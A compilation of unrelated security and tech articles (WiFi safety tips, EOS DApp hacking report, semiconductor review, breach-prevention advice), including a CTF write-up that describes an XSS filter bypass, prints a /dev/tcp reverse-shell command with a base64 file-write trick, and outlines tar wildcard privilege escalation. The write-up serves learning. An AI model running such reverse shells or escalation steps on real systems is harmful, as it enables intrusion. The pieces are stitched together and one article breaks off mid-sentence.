Encryption: Many federal organizations have been successfully using encryption for years. IT organizations should consider it as part of their security plan as well. Even when implemented at the most basic level, encryption can be a great asset for a company. If a company laptop is stolen, for example, the private, proprietary company information stored on that device can be subject to exposure. The laptop user may believe they’re doing well at keeping their documents and personally identifiable information secure, but we all know how easy it is to make errors, such as saving a document in an insecure place. Encryption can act as a safety net: Breaking encryption takes enormous processing power and a great deal of time, so while a file might be in plain sight, a thief will not be able to access the data and it will be rendered useless to them.

Multi-factor Authentication: Long gone are the days when your primary device password could be your favorite color in all lowercase. Truthfully, you shouldn’t just have one password anymore. Most security questions can be easily guessed or researched now: a quick online search can lead hackers directly to your mother’s maiden name or your high school mascot. The extra layer of security provided by a multi-factor authentication tool is necessary in 2018. With multi-factor authentication another layer of security is added, whether it’s a token or a four-digit code sent to you via an approved communications channel (email, text or even a mobile push authentication tool). It’s another way the good guys have outsmarted the bad.

Firewalls: Firewalls remain a leading, effective security technology. Firewalls have been around since the 1980s and are still an excellent defense for an IT team. With a firewall you can create rules, stay on top of controls, filter traffic and keep people within the organization safe.

Staying Ahead of the Game

While encryption, multi-factor authentication and firewalls are all excellent security management tools, there is one other invaluable tool―user education. As they often say in sports, “Your best defense is a good offense.” User education should be viewed as an investment in your IT organization. Almost every company now has a budget devoted to security, but rather than spending it all on hardware, it’s important to spend some on helping your teams understand risks and best practices. Humans are often security’s weakest link. Understanding how to create a smart password or when not to click on an email can make a world of difference in an organization’s success when it comes to security.

With today’s ever-changing technology landscape, it’s more important than ever to stay aware and educated on current security trends, as well as those that have been rendered ineffective. A flexible and custom security plan that is maintained regularly can be invaluable in today’s technology climate.

Cybersecurity | WiFi is convenient, but what else does it make convenient?

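With the rise of mobile devices and the steady advance of Internet technology, age-old theft, fraud and harassment have taken on a new look. How many people around us know that the WiFi we use every day is actually not secure?

Yes, you read that right. When we go online over WiFi, our personal information is constantly exposed to serious risks and hidden dangers.

An attacker sets up a "copycat WiFi" network, gives it a name similar to a nearby WiFi network and leaves it without a password to lure people into connecting. Once a user is connected, the data they transmit can be monitored by the attacker, and private information, account names, passwords and other related information can easily be stolen. Many people like to leave their phone's WiFi auto-connect feature on all the time, which undoubtedly carries great risk.

Don't believe it? Look at these cartoons; you may well have been in these dangerous situations yourself.

■ Free WiFi access

[Danger]

Criminals usually set up a WiFi network with the same name as a commonly used one, or a similar name, and give it no password or the same password to attract the public to connect. They then hijack DNS on the WiFi router to steer users to phishing sites that capture account names and passwords, or sniff the phone's traffic on the router to obtain plaintext passwords.

[Tips]

◆ In public places, confirm the WiFi name with the business before connecting

◆ Be cautious about using public WiFi that has no password

◆ When using payment apps, use your carrier's 4G network, not public WiFi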

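■ Privately installed WiFi hotspots

[Danger]

Wireless routers have many security weaknesses; for example, the older WEP authentication can be cracked very easily. If a privately installed wireless router is misconfigured, at home the worst outcome is people freeloading on the network or personal data leaking, but in a company it can lead to intrusion into the internal network and the leak of company secrets and customer data, with unthinkable consequences.

[Tips]

◆ Installing a wireless router on the office network must be approved by the company and done securely

◆ Use the secure WPA2 for authentication

◆ Hiding the SSID and binding the MAC addresses of connecting devices is recommended

◆ The WiFi password must be at least eight characters long, include upper and lower case letters, digits and punctuation, and be changed regularly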

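■ WiFi auto-connect

[Danger]

When some phones find a WiFi hotspot that has the same name as a saved one but is not the same hotspot, they will still connect automatically using the saved password, which gives attackers an opening.

[Tips]

◆ When you are not using WiFi, turn off the wireless LAN function on phones and laptops to prevent automatic connection to a malicious WiFi network

◆ After a phone or laptop connects to WiFi, pay attention to the name of the hotspot it connected to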
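The auto-connect risk above comes from matching networks by name alone. The following added example (not part of the original article) shows the kind of check a client or monitoring script can apply to scan results before joining; the profile fields, verdict names, threshold and all sample networks are constructed assumptions.

```python
from dataclasses import dataclass
from difflib import SequenceMatcher

# Relative strength of the link-layer protection an access point advertises.
SECURITY_RANK = {"OPEN": 0, "WEP": 1, "WPA": 2, "WPA2": 3, "WPA3": 4}


@dataclass(frozen=True)
class SavedNetwork:
    ssid: str
    security: str            # protection recorded when the network was saved
    known_bssids: frozenset  # access-point MAC addresses seen on the real network


@dataclass(frozen=True)
class ScanResult:
    ssid: str
    bssid: str
    security: str


def lookalike(ssid, saved, threshold=0.85):
    """Return the saved SSID that `ssid` imitates (similar, not identical), or None."""
    for known in saved:
        ratio = SequenceMatcher(None, ssid.lower(), known.lower()).ratio()
        if ssid != known and ratio >= threshold:
            return known
    return None


def assess(saved, seen):
    """Classify one scanned access point against the saved profiles."""
    profile = saved.get(seen.ssid)
    if profile is None:
        imitated = lookalike(seen.ssid, saved)
        if imitated:
            return ("lookalike", f"name resembles saved network {imitated!r}")
        return ("unknown", "not a saved network; do not join automatically")
    # Same name, weaker protection: the saved password must not be offered,
    # and an open network carrying a trusted name is the classic lure.
    if SECURITY_RANK.get(seen.security, 0) < SECURITY_RANK[profile.security]:
        return ("downgrade", f"saved as {profile.security}, now {seen.security}")
    # Same name and protection but an access point never seen before. A BSSID
    # can be cloned, so this is a prompt for the user, not proof either way.
    if seen.bssid.lower() not in profile.known_bssids:
        return ("new-ap", "unrecognized access point for a saved name")
    return ("ok", "matches saved profile")


# Constructed sample data: two saved profiles and five scan results.
SAVED = {
    "OfficeNet": SavedNetwork("OfficeNet", "WPA2", frozenset({"aa:bb:cc:00:00:01"})),
    "CoffeeShop-Guest": SavedNetwork("CoffeeShop-Guest", "WPA2",
                                     frozenset({"aa:bb:cc:00:00:10"})),
}
SCAN = [
    ScanResult("OfficeNet", "aa:bb:cc:00:00:01", "WPA2"),
    ScanResult("OfficeNet", "de:ad:be:ef:00:01", "OPEN"),
    ScanResult("OfficeNet", "de:ad:be:ef:00:02", "WPA2"),
    ScanResult("CoffeeShop_Guest", "de:ad:be:ef:00:03", "OPEN"),
    ScanResult("Airport-Free", "de:ad:be:ef:00:04", "OPEN"),
]

if __name__ == "__main__":
    for ap in SCAN:
        verdict, reason = assess(SAVED, ap)
        print(f"{ap.ssid:18} {ap.bssid} {ap.security:5} -> {verdict}: {reason}")
```

Only the `ok` verdict should lead to an automatic join; the others call for the user to confirm the network name with its owner, as the tips above recommend.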

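■ WiFi Master Key

[Danger]

After installation, WiFi Master Key-type apps on phones will, by default, automatically upload the passwords of the WiFi networks you connect to. These passwords are generally not shown in plaintext and are only entered automatically when connecting to WiFi, but a vulnerability was once disclosed in which an app could read out the passwords of detected WiFi networks, which makes it possible to join the WiFi with a laptop and use more powerful attack tools.

[Tips]

We recommend not using WiFi Master Key-type apps

If you must use one, we recommend turning off the automatic password upload feature

■ WiFi security summary

In public places, always confirm the WiFi name before connecting;

Do not connect to password-free WiFi, and use 4G for secure payments;

Privately installed routers need approval, and do not forget the security settings;

Turn WiFi off when not in use, and steer clear of WiFi Master Key.

[Afterword]

In the era of the Internet of Everything, freeloading on WiFi seems to have become a basic "survival skill". But while people enjoy the convenience WiFi brings, their general lack of security awareness when going online over WiFi has made WiFi security a disaster zone for all kinds of online traps and phishing fraud. WiFi risks arise mainly in two ways:

First, a legitimate WiFi network is compromised by criminals; second, criminals set up fake hotspots that impersonate trusted ones.

Such copycat WiFi networks generally have no password and no authentication mechanism. The most commonly impersonated are the hotspots of the three major carriers, the default hotspots of well-known businesses, and the default hotspots of well-known router systems, for example CMCC, ChinaNet, ChinaUnicom, Starbucks and TPlink.

To mitigate the security problems described above, all wireless networks need basic security authentication and encryption, including: 1. user authentication, to prevent unauthorized access to network resources; 2. data encryption, to protect data integrity and the confidentiality of data in transit; 3. in everyday use, keep firmware up to date, and patch and upgrade vulnerable wireless routers promptly; 4. on both phones and computers, install security software, which can promptly block and warn about attack techniques commonly used by attackers, such as phishing sites.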

Zhou Hongyi: Cybersecurity technology is a core technology of the Internet of Everything era

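The next decade of China's Internet has begun. Previously the focus of the Internet was on the other side of the ocean; the next round of the Internet will focus on the East.

In the PC Internet era, we followed the world's wave. In the mobile Internet era, we drew on our own advantage, the demographic dividend, to innovate in business models. Now, as we enter the era of the Internet of Everything and artificial intelligence, the Internet will thoroughly change how people connect with people, people with things, and things with things.

The Internet, quantum computing and biotechnology will together drive the fourth industrial revolution, which is what we call the industrial Internet. In the foreseeable Internet of Everything era, competition over core technologies will keep intensifying; whoever achieves breakthroughs in key technologies in artificial intelligence and big data will be able to launch a "dimensionality-reduction strike".

In its first half, the Internet was basically about to-C applications, changing everyone's life through the Internet. In the second half, some new opportunities have matured, which I call "IMABCD".

I is IoT, the Internet of Things; M is Mobile, mobile communications; A is AI; B is Blockchain; C is Cloud; D is Big Data.

These technologies all need concrete application scenarios. Traditional industries hold many application scenarios, which is why Internet companies cannot wipe out traditional industries; but Internet companies hold many technologies and can use them to help traditional industries transform and upgrade, which is also the mainstream thinking of the industrial Internet.

As the whole Internet industry upgrades, security demands arise with it. In the past, if you were not connected to the network you probably would not be attacked; once you are connected, attacks in virtual space may spread into industry.

When WannaCry (a worm-style ransomware) was spreading in 2017, it could leave some hospitals unable to work, and the production workshops of a well-known car maker could not work either, because the production line was also attacked by the virus.

The industrial Internet gives 360 two opportunities. First, these to-B systems have all been informatized and digitized, so who looks after their security? 360 long ago changed from a consumer-facing security vendor that only offered free antivirus and blocked nuisance calls into a vendor that provides all-round security services to governments, the nation, enterprises and the world.

Second, 360 is also thinking about how to combine the IMABCD technologies with scenarios in cities, society and daily life. Previously 360 provided only pure network security services; in future it can provide security services for daily life.

360 is very interested in fire safety, for example installing networked fire and smoke sensors in buildings where crowds gather. These sensors used not to be networked, and nobody knew when they broke. Cameras and big-data analysis can also be used to avoid false alarms, for example when someone holds a cigarette up to a sensor.

When a hazard is detected, people within a radius of 1 km or 500 m can be notified. A fire does not flare up all at once; when it has just started nobody pays attention, and by the time it is large many people may be killed by the smoke. If people receive an alarm and evacuate as soon as the fire starts, casualties will be reduced.

In 2018, 360 put forward the concept of "big security", because the cybersecurity situation is becoming ever more severe: more and more things depend on the Internet, and once the Internet is attacked the consequences are very serious, no less than those of traditional military operations. Ukraine's nuclear power plants have been attacked frequently in the past two years, and Iran's nuclear equipment was attacked as well; what once required sending aircraft to drop bombs can now be done over the network. In the past, attacks stayed in the virtual world and affected computer data; now they can manipulate things directly, and the danger is much greater than before.

Cybersecurity technology, like artificial intelligence, big data and the Internet of Vehicles, is a key core technology of the Internet of Everything. 360 has always attached great importance to R&D in security technology; last year we spent 2.4 billion, and we will keep increasing investment in big security to better protect this world in the Internet of Everything era.

The ZTE chip incident that broke out in 2018 also warns us that only countries that hold core technologies can hold their own destiny. In the Internet of Everything era, what worries us most is security. Cybersecurity is no longer just information security, nor just scanning computers for viruses and blocking scam calls on phones; it bears on national security, defense security, social security, infrastructure security, and even everyone's personal safety.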

Hacker attacks, complex transactions: the unprofitable business of EOS gambling

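"USD 4 billion raised, 21 super nodes, a million TPS (transactions per second)": the clever BM single-handedly built the largest ICO fundraising project in history, EOS. Once riding high before its mainnet launch, it has now been reduced to a pure gambling public chain, and its bug-ridden contract code has drawn frequent harassment and attacks from hackers.

What has the once-ambitious EOS been through lately? Why are attacks on the EOS ecosystem growing ever more rampant? Is the gambling business on EOS worth doing? Gao Jin (a pseudonym), who got in early, thought EOS gambling games were a profitable business, but he has now given up. He told ChainDD (链得得) that the market is too small and basically unprofitable.

A lively crowd of participants

On June 9, 2018, the EOS public chain completed its mainnet launch amid controversy. Unlike Ethereum, where every transaction requires a high GAS fee, users on EOS can complete transfers without transaction fees. This "gimmick" prompted developers to move quickly to the EOS platform.

According to a comparison of data from the PeckShield situational-awareness platform, three months after the EOS mainnet launch its daily active users exceeded ETH's; five months after launch, EOS's daily active users were close to 9 times ETH's.

At the end of August, with the rise of EOS DApps, EOS's transaction value exceeded ETH's for the first time and kept growing strongly. ETH, by contrast, catalyzed by the hit "gambling" game Fomo3D, saw its transaction value peak on July 20. After the brief boom brought by Fomo3D, ETH fell back to a low level in both activity and transaction value, and showed no notable fluctuation in the following months.

ETH & EOS DApp transaction value

In terms of transaction count, ETH's theoretical peak transactions per second (TPS) is 25, but between January 1 and November 22, 2018, ETH's average TPS was 8.15, far below expectations. So under the TPS limit, the surge in transaction value caused by Fomo3D did not bring a corresponding change in transaction volume, and transaction volume on the ETH chain has stayed at a steady low.

EOS was able to generate so much hype before its mainnet launch thanks to its loudly proclaimed "million TPS". Bear in mind that the TPS of the centralized product Alipay is only about 300,000. Security, stability and scalability cannot all be had at once, which is known as the blockchain impossible triangle; raising network transaction speed through TPS also sacrifices some of the blockchain's security or stability.

If EOS could achieve a million TPS, that would be enough to make blockchain scalability fit any scenario. But in the half year since the EOS mainnet went live, its TPS has been under 4,000. A technical expert working on public-chain development told ChainDD that a TPS of 3,000 can meet the vast majority of business needs. For EOS, a weakly centralized public chain, judging from current DApp usage, a TPS of 4,000 has not become a bottleneck for transactions. While ETH hovered at a low over the same period, EOS's transaction volume rose sharply.

According to PeckShield's EOS network-wide ecosystem data, as large numbers of gambling DApps were developed and launched on the EOS public chain, EOS's DAU (daily active users) broke through one ten-thousand mark after another, peaking close to 80,000. Thanks to the money-drawing power of gambling games, EOS seemed to have been brought to life.

However, the guessing and gambling games replicated on the EOS platform are also replicating Ethereum's role as "victim": hackers have begun to harass EOS frequently.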

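EOS overrun by hackers

As of November 26, 27 DApp security incidents had occurred on the EOS public chain, with losses of nearly 400,000 EOS, worth 10 million RMB. Such incidents are intensifying, and attackers' techniques keep evolving and becoming more complex.

The types of the 27 recorded DApp security incidents show that the attacked contracts were concentrated on issues such as the "random number problem" and the "fake EOS attack". Put simply, "fake EOS" can be understood as follows: an attacker creates an EOS-based token, names it "EOS", and starts transferring large amounts of the fake EOS token to the targeted contract account. Because the contract does not check the issuer of the EOS, it mistakes the "fake EOS" transfer for a real one and goes on to pay out prizes according to the draw process.

The random number problem is the biggest problem game developers face. At present, random numbers on both Ethereum and EOS are not truly random and can potentially be predicted or exploited, which leads to vulnerabilities.

EOS DApp security incident list

Shi Huaguo, a security expert at the security company PeckShield, told ChainDD that the EOS ecosystem started less than six months ago, the EOS system is still being gradually improved, and the system itself also has vulnerabilities. From the developer's perspective, DApps are brand new to all developers; in particular, contracts are developed in C++, which is harder to pick up and more prone to all kinds of insufficiently rigorous logic handling.

The figure shows how DApp attack techniques evolved: at the end of July the Werewolf game suffered an overflow attack, and in August EOSBet had a contract RAM-devouring problem, both of which are system security issues; attacks in September and October were mainly fake EOS and fake transfer notification attacks caused by missing basic validation in DApp development; and in November random number attacks appeared frequently, all of which are development logic issues.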
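The "fake EOS" and fake transfer notification incidents described above both come down to missing validation of an incoming transfer. The following added example (not code from the article or from any EOS project) models a transfer notification in Python and contrasts a name-only check with the basic checks a payment handler needs; the account names and amounts are constructed, and the field layout is a simplified assumption.

```python
from dataclasses import dataclass

REAL_TOKEN_CONTRACT = "eosio.token"  # system contract that issues the real EOS token
SELF = "dicegame1111"                # hypothetical game contract account


@dataclass(frozen=True)
class TransferNotice:
    code: str       # contract whose action produced this notification
    action: str
    sender: str     # the transfer's "from" field
    to: str
    amount: int     # smallest units (1 EOS = 10**4 units)
    symbol: str
    precision: int


def naive_accepts(n):
    """The flawed check: trusts the action name and the token symbol only."""
    return n.action == "transfer" and n.symbol == "EOS"


def validate(n):
    """Return (accepted, reason) after the basic checks a payment handler needs."""
    if n.code != REAL_TOKEN_CONTRACT:
        return (False, f"token issued by {n.code}, not {REAL_TOKEN_CONTRACT}")
    if n.action != "transfer":
        return (False, "not a transfer action")
    if n.sender == SELF:
        return (False, "outgoing payment, nothing to credit")
    if n.to != SELF:
        return (False, "forwarded notification: this contract is not the payee")
    if (n.symbol, n.precision) != ("EOS", 4):
        return (False, "unexpected symbol or precision")
    if n.amount <= 0:
        return (False, "non-positive amount")
    return (True, "ok")


def credited(notices, accept):
    """Total units a game would credit as bets under the given acceptance rule."""
    return sum(n.amount for n in notices if accept(n))


# Constructed notifications: one genuine bet, one token named "EOS" issued by
# another contract, one real transfer between two third parties that was merely
# forwarded to the game, and one payout sent by the game itself.
NOTICES = [
    TransferNotice("eosio.token", "transfer", "player1", SELF, 10_000, "EOS", 4),
    TransferNotice("attackertokn", "transfer", "attackera", SELF, 1_000_000_000, "EOS", 4),
    TransferNotice("eosio.token", "transfer", "attackera", "attackerb", 500_000, "EOS", 4),
    TransferNotice("eosio.token", "transfer", SELF, "player1", 20_000, "EOS", 4),
]

if __name__ == "__main__":
    print("credited by name-only check:", credited(NOTICES, naive_accepts))
    print("credited after validation:  ", credited(NOTICES, lambda n: validate(n)[0]))
    for n in NOTICES:
        print(n.code, n.sender, "->", n.to, validate(n))
```

In an EOSIO C++ contract the same conditions are checked on the `code` value the contract's dispatcher receives and on the `to` field of the transfer.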

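EOS warmed up gradually as DApps were developed. On October 26, the DAU (daily active users) of BetDice and EOSTiger both exceeded 30,000, while network-wide DAU at the time was only a little over 60,000; in other words, the two games' combined DAU exceeded the total number of active EOS users on the whole network. "The two games' users must overlap heavily, but could the EOS blockchain ecosystem, like the Internet, also have fake traffic data?"

PeckShield's analysis found that of the 500,000 total users, only 37% were real players. Another 23% were group-controlled accounts (sub-accounts controlled by the same person) and 39.82% were silent accounts (accounts that had never initiated any action since they were created).

EOS daily active users comparison

Comparing the two figures on the last day of the statistics period, active-account DAU was 30,000 and all-account DAU was 66,000; group-controlled account DAU made up more than half of all DAU, meaning that group-controlled account DAU exceeded that of real players.

Shi Huaguo told ChainDD: "Group-controlled accounts affect only DAU; they have almost no effect on DApp transaction value and do not affect transaction mining. This also shows that the behavior of group-controlled accounts so far is still simple DAU inflation and small-scale freebie hunting in games."

In November, EOS saw an attack on the game project EOS WIN: to carry out a random number vulnerability attack, the attacker used 6 accounts to deploy 6 contracts that attacked in parallel, and gained 9,000 EOS within 1 minute. This case is also the most technically complex of the attacks so far. Shi Huaguo said attack techniques will become increasingly complex and diverse.

Unprofitable EOS

ChainDD noted that EOS's average on-chain turnover over the past two months was USD 100 million, which is enormous. "A large number of people are farming platform tokens, which makes transaction turnover on EOS huge." EOS gambling player Gao Jin told ChainDD that most gambling projects on the EOS public chain give platform tokens to players. Precisely because of this mechanism, large numbers of freebie-hunting players have appeared. Daily active EOS users in China total only about 6,000, or 10,000 including overseas players, and everyone is in a state of "you fleece me, I fleece you", so in the end there are no winners.

Transfers and running smart contracts on EOS do not consume EOS tokens. But in the EOS system, applications consume three types of resources: RAM (memory), network bandwidth, and CPU bandwidth.

Put simply, EOS is similar to the Android system, and smart contracts developed on EOS are the applications on top of the operating system. When creating an EOS account, a user has to go through a complicated series of steps: buying RAM, buying bandwidth and buying CPU. RAM is the resource required to store data on the blockchain and must be bought from the system with EOS. The more data is stored, the more RAM is needed.

So RAM is EOS's lifeblood. Registering an account in an EOS wallet, initiating transactions, creating smart contracts, issuing tokens and sending airdrops all consume RAM.

"Activating an EOS account consumes three resources, NET, CPU and RAM. In other words, opening an EOS address costs 50-200 RMB, so the barrier to entry for players is high." Gao Jin complained to ChainDD that the experience of EOS gambling games is extremely poor. A centralized experience is always better than a decentralized one; when players can clearly play a gambling game at low cost, why would they choose EOS?

Gao Jin once considered running a CPU and RAM leasing business on the EOS public chain, but found that the whole market amounts to only about 100,000 EOS; the industry is too small and there is basically no possibility of expanding the business. Gao Jin said: "Developing gambling DApps on EOS is like opening a supermarket in a township in Beijing's Pinggu District. There is no competition from JD.com or Taobao, and you can make some money selling instant noodles, but the store has no way to expand."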

swpu ctf "Interesting Email Registration": a detailed write-up

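It has to be said that the swpu team put real care into their challenges. This one is very good: it has both front-end XSS and back-end privilege escalation, so it is quite comprehensive. Below is a brief analysis.

Challenge URL: http://118.89.56.208:6324

Email validation

Opening the challenge, we find only two functions: one validates an email address and the other is the admin back end. The admin back end requires local access, so the way in must be email validation.

Submitting an email address reveals a source code leak that shows how the input is filtered:

So we tried XSS in the email field. After some googling we found several bypasses and tried them; it turns out that something like "poc"@qq.com is enough to get past the filter. We then built the XSS payload as follows:

The request comes in.

Attacking the local web

Now that we have XSS, we first read the source of the admin page:

The JS is constructed as follows:

We then receive the request, which decodes to:

In the page we find what looks like a command execution page, and try constructing a request:

The result arrives quickly:

But issuing requests like this every time to run commands is tedious, so we might as well get a reverse shell.

Reverse shell

Spawning a shell directly with a command rarely succeeds here because several layers of encoding have to be considered, so we write a sh file and then execute it to get the shell:

The trick used to write the file is base64: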

echo 'bHM=' | base64 -d > /tmp/xjb.sh

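This approach gets around a lot of encoding issues. In the same way, we only need to encode /bin/bash -i > /dev/tcp/ip/port 0<&1 2>&1 and put it into the command above to write the reverse shell command into the file.

Then execute: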

/bin/bash /tmp/xjb.sh

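and the shell connects back.

Can't read the flag?

We looked at the flag and found we cannot read it: we lack permission, and only the flag user can read it.

Looking around further, we find a new directory:

Inside is a new web application. Checking permissions:

Only backup.php is readable. Its code is as follows:

Visiting the directory shows upload and backup functions; the backup code is the one given.

Analysis

Since we cannot read the flag directly, we have to get the flag user or a higher-privileged user to read it for us. The tar command looked off, and a search turned up a technique that uses tar to escalate privileges and run a script; for the article, click here.

As the article explains, the tar command can be made to run a custom script, so this command execution with seemingly no controllable input becomes exploitable:

The attack plan is as follows:

Creating and uploading the malicious file

Using the command from the article, create files with malicious file names:

The content of 1.sh is:

Triggering the bash script via backup to get the flag

Simply visiting backup.php triggers the vulnerability and yields the flag.

Afterword

With the challenge done, the approach can be summarized as: bypass FILTER_VALIDATE_EMAIL and then XSS, attack the local web application that is only reachable locally to get a shell on the machine, then go on to attack the internal web challenge and use tar privilege escalation to view the flag. I learned quite a lot; if you have other approaches, feel free to discuss.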
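From the defender's side, the tar step works because a backup job lets uploaded file names reach tar's option parser. The following added example (not part of the original write-up) shows how a backup job can build its argument list so that file names are only ever treated as paths, and how to flag option-like names in an upload directory. The backup.php code is not reproduced on this page, so the directory layout, archive path and sample file names are constructed assumptions.

```python
import os
import tempfile


def option_like(names):
    """File names that a command-line parser could mistake for options."""
    return sorted(n for n in names if n.startswith("-"))


def build_backup_argv(directory, archive):
    """Return (argv, suspicious) for archiving every entry in `directory`.

    The argv is meant for subprocess.run(argv) with no shell, so no wildcard
    expansion takes place. Two independent safeguards keep names out of the
    option parser: "--" ends option parsing, and the "./" prefix makes every
    operand unambiguously a path.
    """
    names = sorted(os.listdir(directory))
    suspicious = option_like(names)
    argv = ["tar", "-czf", archive, "-C", directory, "--"]
    argv += ["./" + name for name in names]
    return argv, suspicious


def demo():
    """Run the builder on a constructed upload directory with one hostile name."""
    with tempfile.TemporaryDirectory() as upload_dir:
        for name in ("report.txt", "--looks-like-an-option=1"):
            with open(os.path.join(upload_dir, name), "w") as fh:
                fh.write("constructed sample\n")
        argv, suspicious = build_backup_argv(upload_dir, "/tmp/backup.tgz")
    # Drop the fixed prefix (tar -czf <archive> -C <dir>) so the result is stable.
    return argv[5:], suspicious


if __name__ == "__main__":
    operands, suspicious = demo()
    print("operands passed to tar:", operands)
    print("names to quarantine:   ", suspicious)
```

An upload handler can apply `option_like` at upload time and reject or rename such files, so the backup job never sees them.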

Fundamental Shifts In 2018


What surprised the industry in 2018? While business has been strong, markets are changing, product categories are shifting and clouds are forming on the horizon.

As 2018 comes to a close, most companies are pretty happy with the way everything turned out. Business has been booming, new product categories developing, and profits are meeting or beating market expectations. “2018 was indeed an exciting year for semiconductors, with growth in almost every sector and application,” notes Tom Wong, director of marketing for design IP at Cadence. “According to WSTS, worldwide semiconductor revenue will hit approximately $478 billion in 2018. This is an increase of 15.9% from 2017.”

New technologies are becoming mainstream. “2018 was surprisingly surprising,” says Thomas Uhrmann, director of business development at EV Group. “It was a strong year across a wide swath of technology. Optical sensing was very strong, but that was expected. The first major products are booming in the market now. Apple’s face ID had a large impact on this market. Customers are now forming consortia right and trying to prepare for the future.”

However, the warning signs on the horizon are growing. Capital spending is slowing, inventory is rising, and a trade war with China shows no sign of abatement. All of those can be highly damaging. Nobody wants to talk publicly about those possibilities yet, but they are beginning to tilt the outlook for 2019.

Artificial intelligence

Meanwhile, in 2018, artificial intelligence (AI) was perhaps the buzzword of the year. Lauro Rizzatti, a verification consultant, agrees. “Artificial intelligence, machine learning (ML) and deep learning became the industry’s words of the year in 2018 and created intriguing areas where startups are making inroads in innovative ways. Neural network acceleration, for example, got a lift from a software stack that sits atop an FPGA, optimizing its performance and concealing the FPGA programming from the user to ease deployment.”

Nobody gets an award for having seen this trend. “We were right that AI would rapidly expand to consume all industry sectors, but this wasn’t a hard one to predict: AI is ‘the’ hot topic in technology,” says Simon Forrest, director of Connectivity & Connected Home at Imagination Technologies. “Cloud AI has certainly made strides in 2018, but many companies also used AI in name alone as a massive marketing tool. Many are not using AI in the truest sense of the word. The majority are exploiting pattern-matching algorithms alongside big data analytics, then claiming it as AI. This resulted in ‘IoT’ largely being replaced by ‘smart technology’, with that smartness implying some form of AI.”

The fall of another area also is helping. “In 2018, we saw the slowdown in bitcoin mining and its impact on the foundry and crypto SoC business,” says Wong. “But don’t worry, the industry is very resilient and is already moving to the next big thing: ML/AI SoCs. Just look at the VC activities in the U.S. and China and you will get the picture.”

The rise in development of special accelerator chips for the Cloud is also interesting. These chips defy the rules in some sense because they are being designed and built to sell services offered by the same company that is developing them.

Disappointments

But not everything was great in 2018. “It’s fair to say that augmented reality (AR) didn’t really move forward much in 2018,” says Forrest. “Mass market adoption of AR glasses depends on the need to be reasonably priced. The glasses themselves also need to be sleeker in design, while issues with battery life still need to be addressed. The potential is certainly there for AR, but its success is unfortunately tied into the success of wearable displays in general and will get thwarted somewhat in 2019 by the continued disillusionment with virtual reality (VR).”

Wong agrees. “AR/VR did not quite make it to the party. While a few high-end phones support AR/VR, most of them are still a work in progress.”

Everyone knows that mobile phones are no longer the growth leader, but 2018 was the wakeup call on that front. “I had predicted smartphone shipments would reach 1.6 billion units in 2018, compared to worldwide shipments of 1.472 billion units in 2017,” says Wong. “Unfortunately, the market was not that kind. Right now, it appears the smartphone market will close 2018 with worldwide shipments of about 1.5 billion units. I thought we would have some growth in 2018, but worldwide unit shipments were flat. This is clear confirmation that the worldwide smartphone market is saturated. Even in China, unit sales in 2018 came in below unit shipments in 2017. We also witnessed a change in ranking for top-tier suppliers and saw a strong showing by Vivo, OPPO and Xiaomi in China. All of these mid-priced Chinese smartphones have really good industrial designs and premium features. I had predicted Xiaomi would go public in 2018 with a valuation of $60 billion (USD). Well, Xiaomi did go public on the Hong Kong Stock Exchange during the summer of 2018, but at a valuation of $54 billion.”

Foundry changes

2018 brought major change to foundries, as well. “The most interesting news this year is the announcement by GlobalFoundries that they are stopping development of 7nm and any advanced node after 7nm,” says Navraj Nandra, senior director of product marketing for the Solutions Group at Synopsys. “In the past there was always Intel, GF, Samsung, TSMC, with fairly well mapped out development paths. GF has said it is expensive and that they were not seeing the return.”

The industry has been talking about an increasing percentage of designs staying on older nodes. “GlobalFoundries has seen a sweet spot for their business at 14nm and 28nm/22nm, especially with FD-SOI,” adds Nandra. “They have found a niche in specialty technologies, and the mainstream finFET node right now is 16/14/12. GF is a substantial provider at that node. Analog and RF will become their focus. The opportunity is rich with all of the interest in IoT (edge or Industrial) that use these types of technologies. Automotive there are customers wanting 28nm, and FD-SOI is interesting here.”

Competition is heating up on older nodes, as well, as both demand and capacity continue to grow. “China is still behind in semiconductors,” says EV Group’s Uhrmann. “A lot of fabs are being built and a lot of 300mm capacity is coming online. We are seeing China acquire a lot of technologies. People are getting worried about a trade war, and so are reconsidering joint ventures. We already see a lot of our customers re-concentrating efforts back to the U.S.”

With foundries revamping old nodes, the rate at which new processes are being released is accelerating. Many of these are focused on particular industries, such as IoT or automotive. This is putting a strain on the IP industry.

“In the past you were developing one USB that covered multiple market segments or one DDR,” explains Nandra. “You now have a dedicated USB 2 for IoT and one for consumer of mobile. And if you look at how the IP is designed, even though the electrical specifications are the same, the actual layout looks different. It is no longer a certainty that if you build a piece of IP on a certain process that you will get a lot of customers.”

The IP industry itself is being shaken up by the introduction of the RISC-V open source instruction-set architecture (ISA). “I tend to underestimate how big momentum is,” says Krste Asanovic, professor at UC Berkeley and chief architect for SiFive. “Even though I am enthusiastic and believe that it is doing really well, it always

Types of Data Breaches and How To Prevent Them


Data breaches happen practically every day. Personal data, including financial and medical data, leaks to cyber criminals as well as intelligence agencies. Some notable breaches include the Equifax breach, where dozens of personal data fields were leaked, and the recent Marriott breach, where passports, credit cards and locations of people at a given time were breached.

I’ve been doing some data protection consultancy as well as working on a data protection product and decided to classify the types of data breaches and give recommendations on how they can be addressed. We don’t always get to know how exactly the breaches happen, but from what is published in news articles and post-mortems, we can have a good overview on the breach landscape.

Control over target server: if an attacker is able to connect to a target server and gains full or partial control over it, they can do anything, including running SELECT * FROM ... , copying files, etc. How do attackers gain such control? In many ways, most notably RCE (remote code execution) vulnerabilities and weak admin authentication.

How to prevent it? Follow best security practices: regularly update libraries and software to get security patches, do not run native commands from within the application layer, open only necessary ports (80 and 443) to the outside world, and configure 2-factor authentication for administrator login. Aim at having an intrusion detection / prevention system. Encrypt your data, and make the encryption as granular as possible for the most sensitive data (e.g. for SentinelDB we utilize per-record encryption) to avoid SELECT * breaches.

SQL injections: this is a rookie mistake that unfortunately still happens. It allows attackers to manipulate your SQL queries and inject custom bits into them that allow them to extract more data than they are supposed to.

How to prevent it? Use prepared statements for your queries. Never ever concatenate user input in order to construct queries. Run regular code reviews and use code inspection tools to catch such instances.

Unencrypted backups: the main system may be well protected, but attackers are usually after the weak spots. Backup storage might be one: if you store unencrypted backups that are accessible via weak authentication (e.g. over FTP via username/password), then someone may try to attack this weaker spot. Even if the backup is encrypted, the key can be placed alongside it, which makes the encryption practically useless.

How to prevent it? Encrypt your backups, store them in a way that’s as strongly protected as your servers (e.g. 2FA, internal-network/VPN only), and have your decryption key in a hardware security module (or equivalent, e.g. AWS KMS).

